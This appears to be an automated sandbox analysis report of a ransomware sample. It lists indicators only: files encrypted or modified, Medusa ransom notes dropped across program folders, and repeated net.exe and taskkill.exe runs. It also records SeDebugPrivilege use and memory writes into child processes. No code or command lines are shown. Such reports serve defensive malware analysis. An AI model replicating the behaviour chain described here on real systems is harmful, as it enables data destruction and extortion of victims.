File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-40_contrast-white.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\YahooPromoTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-black\MedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\1033\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-black\LargeTile.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\IrisProtocol.winmd C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-30.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailWideTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\ui-strings.js C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\ink\uk-UA\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\icon_play_nor.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1194130065-3471212556-1656947724-1000\{BCAE019F-76A7-406C-BA78-5CF87BABD458} C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1856 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 3144 wrote to memory of 1264 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3144 wrote to memory of 1264 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3144 wrote to memory of 1264 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2212 wrote to memory of 4560 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2212 wrote to memory of 4560 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2212 wrote to memory of 4560 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 3904 wrote to memory of 3980 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3904 wrote to memory of 3980 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3904 wrote to memory of 3980 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1984 wrote to memory of 4840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1984 wrote to memory of 4840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1984 wrote to memory of 4840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1208 wrote to memory of 4836 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1208 wrote to memory of 4836 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1208 wrote to memory of 4836 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 4204 wrote to memory of 1796 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4204 wrote to memory of 1796 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4204 wrote to memory of 1796 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 5048 wrote to memory of 5024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 5048 wrote to memory of 5024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 5048 wrote to memory of 5024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 3996 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3996 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3996 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
